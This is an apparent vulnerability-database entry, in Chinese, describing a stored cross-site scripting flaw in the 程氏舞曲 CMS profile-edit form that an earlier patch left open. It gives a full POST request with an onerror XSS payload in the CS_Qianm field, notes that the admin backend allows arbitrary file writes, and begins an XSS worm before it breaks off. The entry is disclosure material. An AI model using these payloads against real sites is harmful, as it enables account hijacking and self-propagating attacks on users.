程氏舞曲CMS又一储存型xss

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: xss ### 详细说明: 官网修补的不太彻底啊。。 同样是修改 资料处。 火狐 修改下 post包提交 CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/'xss'/)> [<img src="https://images.seebug.org/upload/201311/1103282656fc41e3b441ffa852281f604af7e8ff.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/1103282656fc41e3b441ffa852281f604af7e8ff.jpg) 出来了。。 [<img src="https://images.seebug.org/upload/201311/110328507758bef3362c8f4fb0d2504a60a561b5.jpg" alt="b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/110328507758bef3362c8f4fb0d2504a60a561b5.jpg) 后台还是可以 写入任意文件。。。 构造 xss worm如下 ``` <isindex type=image src=1...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息